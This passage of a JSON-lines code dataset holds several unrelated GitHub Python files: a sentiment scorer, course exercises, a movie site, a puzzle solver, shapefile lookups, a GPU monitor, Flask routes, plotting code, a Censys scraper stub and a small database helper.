0\n tokenized_sent = [word.lower() for word in tokenizer.tokenize(text)]\n\n for word in tokenized_sent:\n if 
word in opinion_lexicon.positive():\n pos_words += 1\n elif word in opinion_lexicon.negative():\n neg_words += 1\n\n if pos_words > neg_words:\n return 1\n elif pos_words < neg_words:\n return -1\n elif pos_words == neg_words:\n return 0\n\n# assigning only positive and negative may be too rash, we should somehow take into account the number \n# of words and the difference between the number of positive words and the number of negative words\ndef sentiment_liu_hu_mod(text):\n pos_words = 0\n neg_words = 0\n tokenized_sent = [word.lower() for word in tokenizer.tokenize(text)]\n\n for word in tokenized_sent:\n if word in opinion_lexicon.positive():\n pos_words += 1\n elif word in opinion_lexicon.negative():\n neg_words += 1\n \n return (pos_words - neg_words)/len(tokenized_sent)\n\n# load from pickle\ncountries_dict = pickle.load( open( \"countries_dict.p\", \"rb\" ) )\n\ncountry_sentiment_liu = {}\ncountry_sentiment_liu_mod = {}\ncountry_count = {}\nemail_num = 1\nnum_emails = len(emails.ExtractedBodyText)\n\n# Step 1 - compute cumulative scores and number of mentions\nfor text in emails.ExtractedBodyText:\n \n #debug info\n if email_num % 1000 == 0:\n print(\"Email number %d/%d\" % (email_num,num_emails))\n email_num += 1\n \n if text is not np.nan: # skip text if invalid\n # split text into lines\n lines_list = tokenize.sent_tokenize(text)\n # for each line search for countries and perform sentiment \"analysis\"\n for line in lines_list:\n countries_found = None\n countries_found = list(set([countries_dict[c] for c in countries_dict.keys() if c in line]))\n if countries_found is not None: # if found country, perform sentiment analysis\n score = sentiment_liu_hu_mod(line)\n # update score for each country\n for country in countries_found:\n try:\n country_sentiment_liu_mod[country] += score\n country_sentiment_liu[country] += np.sign(score)\n country_count[country] += 1\n except: # if country not yet in dictionary\n country_sentiment_liu_mod[country] = score\n country_sentiment_liu[country] = np.sign(score)\n country_count[country] = 1","repo_name":"BeforeRain/AppliedDataAnalysis","sub_path":"05 - Taming Text/liu_hu_sentiment_analysis.py","file_name":"liu_hu_sentiment_analysis.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30113791905","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 11 08:41:20 2022\n\n@author: juani\n\"\"\"\n\n#8.7\nimport csv\n\nfrom fileparse import parse_csv\n\ndef leer_camion(archivo):\n with open(archivo) as f:\n contenido_camion= parse_csv(f, has_headers=True)\n return contenido_camion\n\n\ndef leer_precios(archivo):\n with open(archivo) as f:\n lista_precios= parse_csv(f, has_headers=False)\n return lista_precios\n\n\ndef imprimir_informe(nombre_archivo1,nombre_archivo2):\n camion = leer_camion(nombre_archivo1)\n precios = leer_precios(nombre_archivo2)\n headers = ('Nombre', 'Cajones', 'Precio', 'Cambio')\n sep = ('----------')\n print(f'{headers[0]:>10s} {headers[1]:>10s} {headers[2]:>10s} {headers[3]:>10s}')\n print(f'{sep:>10s} {sep:>10s} {sep:>10s} {sep:>10s}')\n for s in camion:\n lista = ((s['nombre'], s['cajones'], '$' + str(s['precio']), precios[0][1] - s['precio']))\n print('%10s %10d %10s %10.2f' % lista)\n\n \n# def informe_camion(nombre_archivo_camion, nombre_archivo_precios):\n# leer_camion(nombre_archivo_camion)\n# leer_precios(nombre_archivo_precios)\n# imprimir_informe(nombre_archivo_camion, nombre_archivo_precios)\n\n# 
camion=leer_camion('../Data/camion.csv')\n\n# precio=leer_precios('../Data/precios.csv')\ninforme=imprimir_informe('../Data/camion.csv','../Data/precios.csv')\n# informe_camion('../Data/fecha_camion.csv','../Data/precios.csv')","repo_name":"juanamolinalucia2001/python2C-unsam2022","sub_path":"Clase08/informe_final.py","file_name":"informe_final.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73177556211","text":"import media\r\nimport fresh_tomatoes\r\n\r\n#Information about toy story\r\ntoy_story = media.Movie(\"Toy Story\",\r\n \"A story of a by and his toys that can\",\r\n \"http://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\",\r\n \"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\r\n#Information about avatar\r\navatar = media.Movie(\"Avatar\",\r\n \"Avatar is a 2009 American science fiction adventure movie\",\r\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMTYwOTEwNjAzMl5BMl5BanBnXkFtZTcwODc5MTUwMw@@._V1_.jpg\",\r\n \"https://www.youtube.com/watch?v=5PSNL1qE6VY&t=2s\")\r\n\r\n#Information about hunger games\r\nhunger_games = media.Movie(\"Hunger Games\",\r\n \"This article is about the book series. \",\r\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMjA4NDg3NzYxMF5BMl5BanBnXkFtZTcwNTgyNzkyNw@@._V1_SY1000_CR0,0,674,1000_AL_.jpg\",\r\n \"https://www.youtube.com/watch?v=mfmrPu43DF8\")\r\n#Information about la la land\r\nla_la_land = media.Movie(\"La la land\",\r\n \"La La Land is a 2016 American musical romantic comedy-drama film\",\r\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMzUzNDM2NzM2MV5BMl5BanBnXkFtZTgwNTM3NTg4OTE@._V1_SY1000_SX675_AL_.jpg\",\r\n \"https://www.youtube.com/watch?v=0pdqf4P9MB8\")\r\n#Information about John wick\r\njohn_wick = media.Movie(\"John Wick\",\r\n \" Chapter 1, is a 2014 American neo-noir action thriller film\",\r\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMTU2NjA1ODgzMF5BMl5BanBnXkFtZTgwMTM2MTI4MjE@._V1_SY1000_CR0,0,666,1000_AL_.jpg\",\r\n \"https://www.youtube.com/watch?v=2AUmvWm5ZDQ\")\r\n#Information about John wick\r\nthe_best_of_me = media.Movie(\"The Best Of Me\",\r\n \"The Best of Me is a 2014 American romantic drama film \",\r\n \"https://upload.wikimedia.org/wikipedia/en/6/68/The_Best_of_Me_poster.jpg\",\r\n \"https://www.youtube.com/watch?v=cQszhfoP_WI\")\r\n\r\n\r\nmovies = [toy_story, avatar, hunger_games,la_la_land,john_wick,the_best_of_me]\r\nfresh_tomatoes.open_movies_page(movies)\r\n","repo_name":"BasmaAshraf21/Movie-website","sub_path":"Movie-website/entertainment.py","file_name":"entertainment.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86413706793","text":"#!/usr/bin/env python3\nimport fileinput\nimport re\n\n\ndef cross_join(strs1, strs2):\n result = set()\n for str1 in strs1:\n for str2 in strs2:\n result.add(str1 + str2)\n return result\n\n\ninput = fileinput.input()\n\nrules = []\nfor line in input:\n if not line.strip():\n break\n rules.append(line.strip())\n\ngraph = {}\nwhile rules:\n next_rules = []\n for rule in rules:\n rule_match = re.fullmatch(r'(\\d+): (.+)', rule)\n rule_no = int(rule_match[1])\n\n character_rule_match = re.fullmatch(r'\"(\\w+)\"', rule_match[2])\n if character_rule_match:\n graph[rule_no] = {character_rule_match[1]}\n else:\n reference_rules = []\n for r in rule_match[2].split(' | '):\n reference_rules.append(list(map(int, r.split(' 
'))))\n\n            if all((r in graph) for r in sum(reference_rules, [])):\n                str_rules = []\n                for ref_rule in reference_rules:\n                    str_rules.append(list(map(graph.get, ref_rule)))\n\n                new_rule = set()\n                for str_rule in str_rules:\n                    strs = str_rule[0]\n                    for r in str_rule[1:]:\n                        strs = cross_join(strs, r)\n                    new_rule.update(strs)\n                graph[rule_no] = new_rule\n            else:\n                next_rules.append(rule)\n    rules = next_rules\n\nwords = set()\nfor rule_words in graph.values():\n    words.update(rule_words)\n\nresult = 0\nfor line in input:\n    if line.strip() in words:\n        result += 1\nprint(result)\n","repo_name":"jupblb/aoc-2020","sub_path":"day19/solve1.py","file_name":"solve1.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30357944283","text":"# Frames per second\nfps = 32\n\n# Game dimensions\nWIDTH = 1000\nHEIGHT = 1000\n\n# Game variables\ntile_size = 50\ngame_over = 0\nmain_menu = True\nlevel = 0\nmax_levels = 7\nscore = 0\n\n# Define colors\nWHITE = (255, 255, 255)\nBROWN = (82, 48, 6)","repo_name":"the-akira/CC33Z","sub_path":"Cursos/Desenvolvimento de Games 2D/Games/Platformer/Game/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"pt","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"}
+{"seq_id":"36720173486","text":"from shapely.geometry import Point, Polygon\nimport shapefile\n\n\n# Function to locate Country with latitude and longitude\n# Argument as coordinates longitude, latitude, and file path of shapefile\n# Return value as Country name\ndef locate_country(lon, lat, country_fp):\n    # Read the shapefile\n    crf = shapefile.Reader(country_fp)\n\n    # Returns a list of Shape objects describing the geometry of\n    # each shape record\n    shapes_countries = crf.shapes()\n    country_polygons = {}\n\n    for i, record in enumerate(crf.records()):\n        # The border is at the position of index 3\n        country_polygons[record[1]] = Polygon(shapes_countries[i].points)\n\n    # Make the lat and lon a Point object\n    pt = Point(lon, lat)  # appears that longitude first, latitude second\n    this_country = \"\"\n    for c, p in country_polygons.items():\n        # Check if p contains the point\n        if p.contains(pt):\n            this_country = c\n            break\n\n    return this_country\n\n\n# Function to locate State with latitude and longitude\n# Argument as coordinates longitude, latitude, and file path of shapefile\n# Return value as State name\ndef locate_state(lon, lat, state_fp):\n    # Read the shapefile\n    sf = shapefile.Reader(state_fp)\n\n    # Returns a list of Shape objects describing the geometry of\n    # each shape record\n    shapes_states = sf.shapes()\n    state_polygons = {}\n\n    for i, record in enumerate(sf.records()):\n        # The border is at the position of index 5\n        state_polygons[record[5]] = Polygon(shapes_states[i].points)\n\n    # Make the lat and lon a Point object (shapely points take x=lon, y=lat)\n    pt = Point(lon, lat)\n    this_state = \"\"\n    for s, p in state_polygons.items():\n        # Check if p contains the point\n        if p.contains(pt):\n            this_state = s\n            break\n\n    return this_state\n\n\n# Function to locate County with latitude and longitude\n# Argument as coordinates longitude, latitude, and file path of shapefile\n# Return value as County name\ndef locate_county(lon, lat, county_fp):\n    # Read the shapefile\n    cf = shapefile.Reader(county_fp)\n\n    # Returns a list of Shape objects describing the geometry of\n    # each shape record\n    shapes_counties = cf.shapes()\n\n    county_polygons = {}\n    # print(cf.records())\n    for i, record in enumerate(cf.records()):\n        # The border is at the position of index 5\n        county_polygons[record[5]] = Polygon(shapes_counties[i].points)\n\n    # Make the lat and lon a Point object (shapely points take x=lon, y=lat)\n    pt = Point(lon, lat)\n    this_county = \"\"\n\n    for c, p in county_polygons.items():\n        # Check if p contains the point\n        if p.contains(pt):\n            this_county = c\n            break\n\n    return this_county\n\n\n# Testing the above functions\n# test_coord = Point(-86.990100, 40.332937)\n# print(locate_state(45.016302, -79.609751, 'C:/_Study/crowdsourcing/tl_2017_us_state/tl_2017_us_state'))\n# print locate(40.332937, -86.990100, \"venv/shapefiles/ne_110m_admin_0_countries/ne_110m_admin_0_countries\",\n#              \"venv/shapefiles/tl_2017_us_state/tl_2017_us_state\", \"venv/shapefiles/tl_2016_us_county/tl_2016_us_county\")\nprint(locate_country(-80.2358746, 26.224614, 'maps/world_countries_2017'))\n","repo_name":"magickaiyang/tweet_locality","sub_path":"find_boundary.py","file_name":"find_boundary.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2292751873","text":"#coding=utf-8\nimport os\nimport sys\nimport pwd\nimport time\nimport psutil\nimport subprocess\nimport operator\nimport argparse\n\ndef is_cuda_avaiable():\n    try:\n        n = str(subprocess.check_output([\"nvidia-smi\", \"-L\"])).count('UUID')\n    except Exception as e:\n        n = 0\n    return n\n\ndef clear():\n    #print(\"\\033[H\\033[J\")()\n    sys.stdout.write(\"\\x1b[2J\\x1b[H\")\n\ndef get_owner(pid):\n    try:\n        for line in 
open('/proc/%d/status' % pid):\n if line.startswith('Uid:'):\n uid = int(line.split()[1])\n return pwd.getpwuid(uid).pw_name\n except:\n return None\n\ndef get_cmd(pid):\n process=psutil.Process(int(pid))\n cmd=process.cwd()\n for e in process.cmdline():\n cmd+=\" \"+e\n return cmd\n\ndef is_train(name):\n trains=[\"python\",\"caffe\",\"python3\"]\n for train in trains:\n if name.find(train) >= 0:\n return True\n return False\n\ndef get_info(verbose=True):\n gpus=[]\n msg = subprocess.Popen('nvidia-smi', stdout = subprocess.PIPE).stdout.read().decode()\n msg = msg.strip().split('\\n')\n lino = 0\n seen = 0\n while True:\n if '|=' in msg[lino]:\n seen +=1\n if seen == 2:\n lino += 1\n break\n if '| Processes:' in msg[lino]:\n infos = msg[lino+1].split()\n pidpos = infos.index('PID')\n gpupos = infos.index('GPU')\n lino += 1\n maps={}\n while lino < len(msg) -1:\n line = msg[lino]\n items = line.split()\n pid = items[pidpos]\n gpuid = items[gpupos]\n mem_usage = items[-2][:-3]\n if pid in maps.keys():\n maps[pid]=str(gpuid)+\",\"+maps[pid]\n else:\n maps[pid]=str(gpuid)+\"\\t\"+pid+\"\\t\"+mem_usage+\"M\"\n lino += 1\n maps=sorted(maps.items(),key=operator.itemgetter(1),reverse=True)\n lines=[]\n for pid in maps:\n try:\n cmd = get_cmd(pid[0])\n if(is_train(cmd)):\n line=pid[1]+\"\\t\"+cmd\n lines.append((line))\n except Exception as e:\n pass\n lines.reverse()\n line=\"\"\n for i,g in enumerate(gpus):\n line+=str(i)+\":\"+g+\" \\t\"\n if i % 4 == 3:\n line+=\"\\n\"\n if verbose:\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime()))\n #print(line[:-1])\n print(\"gpu\\tpid\\tmemusage\\tdir\\tcmd\")\n runs=[]\n for line in lines:\n runs.append(line)\n if verbose:\n print(line)\n return runs\n\ndef gtop():\n while True:\n runs=get_info(False)\n clear()\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime()))\n for run in runs:\n print(run)\n\ndef write2log(line,path=\"gpu.log\"):\n with open(path,\"a+\") as f:\n f.write(line+\"\\n\")\n\ndef gm():\n allruns={}\n while True:\n runs=get_info(False)\n if len(allruns)==0:\n for run in runs:\n rp=run.split(\" \")[1]\n allruns[rp]=run\n else:\n rps=[]\n for run in runs:\n rp=run.split(\" \")[1]\n rps.append(rp)\n \n for r in list(allruns.keys()):\n if r not in rps:\n run=allruns[r]\n line=time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())+\" \"+run+\" closed\"\n print(line)\n write2log(line)\n del allruns[r]\n \n for i in range(len(rps)):\n run=runs[i]\n if not allruns.has_key(rps[i]):\n line=time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())+\" \"+run+\" created\"\n print(line)\n write2log(line)\n allruns[rps[i]]=runs[i]\n\ndef get_args():\n args=argparse.ArgumentParser()\n args.add_argument(\"-m\", \"--gm\", default=False,help=\"monitor\")\n args.add_argument(\"-t\", \"--gtop\", default=False,help=\"monitor\")\n args.add_argument(\"-g\", \"--info\", default=True,help=\"monitor\")\n return args.parse_args()\n\nif __name__ == \"__main__\":\n args=get_args()\n if not is_cuda_avaiable():\n print(\"There seems no gpu available.\")\n exit(0)\n if args.gm:\n gm()\n elif args.gtop:\n gtop()\n else:\n get_info()","repo_name":"imistyrain/mrcv","sub_path":"mrcv/gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"13389738930","text":"from tkinter import *\r\nwindow = Tk()\r\n\r\n'''\r\nconfig the widget in the window\r\n'''\r\ndef button_func():\r\n button1.config(text = 'howdy')\r\n\r\n'''\r\nuse the command to 
make a call back function\r\n'''\r\n\r\n\r\nbutton1 = Button(window,text = 'haha',command = button_func)\r\nbutton1.pack()\r\n\r\nwindow.mainloop()\r\n","repo_name":"chuyuanver/notes-for-tkinter","sub_path":"tkinter_test/tkinter_test2.py","file_name":"tkinter_test2.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31791655101","text":"# 년원일(yyyy.mm.dd)를 입력받아 일월년(dd-mm-yyyy)로 출력\n# 한 자리 일/월은 0을 붙여 두자리로 출력\n\ny, m, d = input().split('.')\nif (len(m) == 1):\n m = '0' + m\nif (len(d) == 1):\n d = '0' + d\n\nprint('{}-{}-{}'.format(d, m, y))\n\n# tip : 삼항연산자 이용\n# m = '0' + m if len(m) == 1 else m\n# d = '0' + d if len(d) == 1 else d","repo_name":"sangm1n/problem-solving","sub_path":"CodeUp/[009~025] 기초-입출력/025.py","file_name":"025.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38648370952","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# SPDX-License-Identifier: AGPL-3.0-or-later\n\nimport os\nimport glob\nfrom datetime import datetime\n\n\ndef get_files_tree():\n root = \"static/\"\n tree = {}\n for file_path in glob.iglob('static/**', recursive=True):\n file_path = file_path.replace(root, \"\")\n file_dir = \"/\".join(file_path.split(\"/\")[:-1])\n if file_dir not in tree:\n tree[file_dir] = []\n file_name = file_path.split(\"/\")[-1]\n tree[file_dir].append(file_name)\n if \"\" in tree:\n del tree[\"\"]\n return tree\n\n\ndef sizeof_fmt(num, suffix=\"B\"):\n for unit in [\"\", \"Ki\", \"Mi\", \"Gi\", \"Ti\", \"Pi\", \"Ei\", \"Zi\"]:\n if abs(num) < 1024.0:\n return f\"{num:3.1f} {unit}{suffix}\"\n num /= 1024.0\n return f\"{num:.1f} Yi{suffix}\"\n\n\ndef recursive_generate_index_pages(env):\n tree = get_files_tree()\n\n for file_dir in tree:\n file_dir_split = file_dir.split(\"/\")\n\n marker_path_menu = []\n marker_files = []\n for i, split_dir in enumerate(file_dir_split):\n marker_path_menu.append([\"../\"*(len(file_dir_split)-i-1), split_dir])\n\n for file in sorted(tree[file_dir]):\n if file == \"index.html\":\n continue\n\n file_path = f\"{file_dir}/{file}\"\n static_file_path = \"static/\"+file_path\n file_is_dir = os.path.isdir(static_file_path)\n file_size = os.path.getsize(static_file_path) if not file_is_dir else \"-1\"\n file_size_fmt = sizeof_fmt(file_size) if not file_is_dir else \"—\"\n modified = os.path.getmtime(static_file_path)\n file_modified = datetime.fromtimestamp(modified).strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n file_modified_fmt = datetime.fromtimestamp(modified).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n marker_files.append({\n \"is_dir\": file_is_dir,\n \"name\": file,\n \"path\": f\"./{file}\",\n \"size\": file_size,\n \"size_fmt\": file_size_fmt,\n \"modified\": file_modified,\n \"modified_fmt\": file_modified_fmt\n })\n\n markers = {\n \"path\": \"/\"+file_dir,\n \"path_menu\": marker_path_menu,\n \"files\": marker_files,\n \"count_dirs\": sum(x['is_dir'] is True for x in marker_files),\n \"count_files\": sum(x['is_dir'] is False for x in marker_files)\n }\n template = env.get_template(\"__folder_index__.html\")\n html = template.render(markers)\n path = f\"static/{file_dir}/index.html\"\n with open(path, \"w\") as fh:\n 
fh.write(html)\n","repo_name":"IITC-CE/website","sub_path":"pages/__filelist__.py","file_name":"__filelist__.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"10524671126","text":"from flask import Blueprint, abort, jsonify, request\nfrom flaskr.models.models import Classes, Schools\nfrom flaskr.Classes.utils import checkClasses, addClassToDB\n\nclasses = Blueprint('classes', __name__)\n\n\n@classes.route('/api/classes')\ndef get_classes():\n classes_query = Classes.query.order_by('id').all()\n\n if not classes_query:\n abort(404, 'No Classes')\n\n classes_list = [c.display() for c in classes_query]\n\n return jsonify({\n 'classes': classes_list,\n 'success': True\n })\n\n\n@classes.route('/api/classes/')\ndef get_class(class_id):\n class_ = Classes.query.get(class_id)\n\n if not class_:\n abort(404, f'No Class with ID#{class_id}')\n\n class_ = class_.display()\n\n return jsonify({\n 'class': class_,\n 'success': True\n })\n\n\n@classes.route('/api/classes', methods=['POST'])\ndef create_classes():\n\n req = request.get_json()\n\n # Check if request is valid\n if not req:\n abort(400, 'Fields Shouldn\\'t Be Empty!')\n\n grade = req.get('class')\n school_id = req.get('school')\n\n school = Schools.query.get(school_id)\n\n # Check if important data exists in request body\n if not grade or not school:\n abort(422, 'Fields Shouldn\\'t Be Empty!')\n\n # Check if class already exist in the school\n if checkClasses():\n abort(400, f'A Class Is Already Registered In this School With: {grade}')\n\n body = {\n 'grade': grade,\n 'school': school\n }\n\n # Add class to the database\n try:\n addClassToDB(body)\n except Exception as e:\n print(e)\n abort(500, 'Something Went Wrong In Our End.')\n\n # return success value, and class info\n return jsonify({\n 'class': f'Class \"{grade}\" was created successfully!',\n 'success': True\n })\n\n\n@classes.route('/api/classes/', methods=['DELETE'])\ndef delete_classes(class_id):\n class_ = Classes.query.get(class_id)\n # Check if class exist, if not return 404\n if not class_:\n abort(404, f'No Class with ID#{class_id}')\n\n # try to delete class from database\n class_name = class_.grade\n try:\n class_.delete()\n\n except Exception as e:\n print(e)\n abort(500, 'Something Went Wrong In Our End.')\n\n return jsonify({\n 'class': f'Class \"{class_name}\" has ben deleted!',\n 'succes': True\n })\n\n\n@classes.route('/api/classes/', methods=['PATCH'])\ndef update_classes(class_id):\n class_ = Classes.query.get(class_id)\n\n # Check if class exists\n if not class_:\n abort(404, f'No Class with ID#{class_id}')\n\n req = request.get_json()\n\n # Check if request is valid\n if not req:\n abort(400, 'Fields Shouldn\\'t Be Empty!')\n\n updated_grade = req.get('class')\n updated_school_id = req.get('school')\n\n try:\n if updated_grade:\n class_.grade = updated_grade\n else:\n raise Exception\n if updated_school_id:\n pass\n # updated_school = Schools.query.get(updated_school_id)\n # class_.school = updated_school\n\n class_.update()\n\n except Exception as e:\n print(e)\n abort(422, 'Cannot Update This Class.')\n\n return jsonify({\n 'class': f'Class \"{class_.grade}\" has been updated!',\n 'success': True\n })\n","repo_name":"Ebra01/SsMS","sub_path":"flaskr/Classes/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"27473761172","text":"import numpy as np\nimport numpy \nimport math\nfrom models import interpolation , SRCNN_train , SRCNN_model, SRCNN_predict , DNCNN_train , DNCNN_model , DNCNN_predict\n#from scipy.misc import imresize\nfrom scipy.io import loadmat\nimport matplotlib.pyplot as plt\n\nimport matplotlib\n\nif __name__ == \"__main__\":\n # load datasets \n channel_model = \"VehA\"\n SNR = 22\n Number_of_pilots = 48\n num_pilots = Number_of_pilots\n perfect = loadmat(\"Perfect_\"+ channel_model +\".mat\")['My_perfect_H']\n noisy_input = loadmat(\"Noisy_\" + channel_model + \"_\" + \"SNR_\" + str(SNR) + \".mat\") ['My_noisy_H']\n # [channel_model+\"_noisy_\"+ str(SNR)] \n \n interp_noisy = interpolation(noisy_input , SNR , Number_of_pilots , 'rbf')\n\n perfect_image = numpy.zeros((len(perfect),72,14,2))\n print (perfect_image.ndim)\n a = perfect_image[:,:,:,0] = numpy.real(perfect)\n print (perfect_image[:,:,:,0].ndim)\n perfect_image[:,:,:,1] = numpy.imag(perfect)\n perfect_image = numpy.concatenate((perfect_image[:,:,:,0], perfect_image[:,:,:,1]), axis=0).reshape(2*len(perfect), 72, 14, 1)\n \n # 80000, 72, 14 , 1 is the new dimension \n # ####### ------ training SRCNN ------ #######\n # idx_random = numpy.random.rand(len(perfect_image)) < (1/9) # uses 32000 from 36000 as training and the rest as validation\n # train_data, train_label = interp_noisy[idx_random,:,:,:] , perfect_image[idx_random,:,:,:]\n # val_data, val_label = interp_noisy[~idx_random,:,:,:] , perfect_image[~idx_random,:,:,:] \n\nfrom mpl_toolkits import mplot3d\nimport numpy as np\nimport matplotlib.pyplot as plt\n \n\n\nfig = plt.figure()\n \n# syntax for 3-D projection\nax = plt.axes(projection ='3d')\n\n# z = np.linspace (1,2,10)\n# x = numpy.real(perfect)\n# y = np.linspace (1,4,10)\n# print (perfect_image[1,2,3,0])\n# x,y,z = perfect_image[:,:,:,0]\n# defining all 3 axis\n\n# plotting\n\n# For each set of style and range settings, plot n random points in the box\n# defined by x in [23, 32], y in [0, 100], z in [zlow, zhigh].\n# for m, zlow, zhigh in [('o', -50, -25), ('^', -30, -5)]:\n# i = -1 \n# j = -1\n# k = -1\n# flag = 0 \n# print (a.ndim)\n# print (a.shape)\n# for index in a:\n# i = i + 1\n# j = -1\n# for freq in index:\n# j = j + 1\n# k = -1\n# for time in freq:\n# k = k + 1\n# magnitude = a[i,j,k]\n\n# if flag == 0 :\n# vmin = magnitude \n# vmax = magnitude \n# flag = 1\n# elif flag == 1 :\n# if magnitude < vmin :\n\n# vmin = magnitude \n# elif magnitude > vmax :\n# vmax = magnitude \n\n# print (vmax)\n# print (vmin)\n\nvmax = 3.284971134622097\nvmin = -3.1601099347835957\n\ni = -1 \nj = -1 \nk = -1\ncount = -1\nm = 10000\nfor index in a:\n i = i + 1\n j = -1\n\n if count == m :\n break \n\n for freq in index:\n j = j + 1\n k = -1\n\n if count == m :\n break \n\n for time in freq:\n k = k + 1\n magnitude = a[i,j,k]\n \n # plot = ax.scatter(k, j, magnitude, c = magnitude, cmap='viridis', marker='o') # s is marker size # norm = Normalize \n\n plot = ax.scatter(k, j, i, c = i , cmap='viridis', marker=\".\", norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax, clip=False)) \n # s is marker size # norm = Normalize \n\n count = count + 1 \n if count == m :\n break \n# print (x)\n# print (y)\n# print (z)\n# plot = ax.scatter(x, y, z, c = z, cmap='viridis', marker='o') # s is marker size # norm = Normalize \n\nplt.colorbar(plot) # mappable was found to use for colorbar creation\n\nax.set_title('3D line plot geeks for geeks')\n\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z 
Label')\nplt.show()\n\n\n# the math is that computer is good to solve all visual but , how to take x,y,z from perfet_image , \n# if perfect_image [:::0] then only 1 value return is magnitude ","repo_name":"WandererGuy/ChannelNet2","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34878126051","text":"import os\n\n\nfrom parser.censys import CensysParser\n\n\nif __name__ == '__main__':\n\n ip = input('Введите айпи в формате x.x.x.x')\n\n os.environ['CENSYS_API_URL'] = 'https://search.censys.io/hosts/' + ip\n\n parser = CensysParser()\n\n parser\\\n .request()\\\n .perform()\\\n .parse()\\\n .export()\n","repo_name":"eternityxxxx/osint-parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70041225654","text":"import json\nfrom os import path\n\nimport datetime\n\n\nclass Database(object):\n def __init__(self, dirpath=\"db/\", path_prefix=\"\"):\n self.folder_path = dirpath\n self.path_prefix = path_prefix\n\n def _load_file(self, filename: str, default=\"{}\"):\n fp = self.path_prefix + self.folder_path + filename\n self._check_file(fp, default)\n return json.load(open(fp, 'r'))\n\n def _dump_file(self, data, filename: str):\n fp = self.path_prefix + self.folder_path + filename\n json.dump(data, open(fp, 'w+'))\n\n def __get_file(self, fp):\n if not path.isfile(self.path_prefix + fp):\n return []\n return json.load(open(self.path_prefix + fp))\n\n def _check_file(self, fp, default):\n if not path.isfile(self.path_prefix + fp):\n open(self.path_prefix + fp, \"w+\").write(default)\n\n def get_event_oprs(self, event_id):\n from server.models import OprEntry\n entries = OprEntry.query.filter_by(event=event_id).all()\n data = {}\n for entry in entries:\n if entry.team not in data.keys():\n data[entry.team] = {}\n if entry.score_key not in data[entry.team].keys():\n data[entry.team][entry.score_key] = entry.value\n return data\n\n def get_table_headers(self, event, key):\n file_path = self.path_prefix + 'clooney/headers/{}.json'.format(event)\n headers = json.load(open(file_path))\n if key not in headers.keys():\n return []\n else:\n for i in range(len(headers[key])):\n headers[key][i]['sort_id'] = chr(ord('a') + i)\n return headers[key]\n\n def get_raw_data(self, event_id):\n from server.models import ScoutingEntry\n entries = ScoutingEntry.query.filter_by(event=event_id).all()\n return [elem.to_dict()[\"data\"] for elem in entries]\n\n def get_stats_last_modified(self, event_id):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event=event_id, key=\"stats\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_raw_last_modified(self, event_id):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event=event_id, key=\"raw\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_event_list_last_modified(self):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event='all', key=\"event_list\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d 
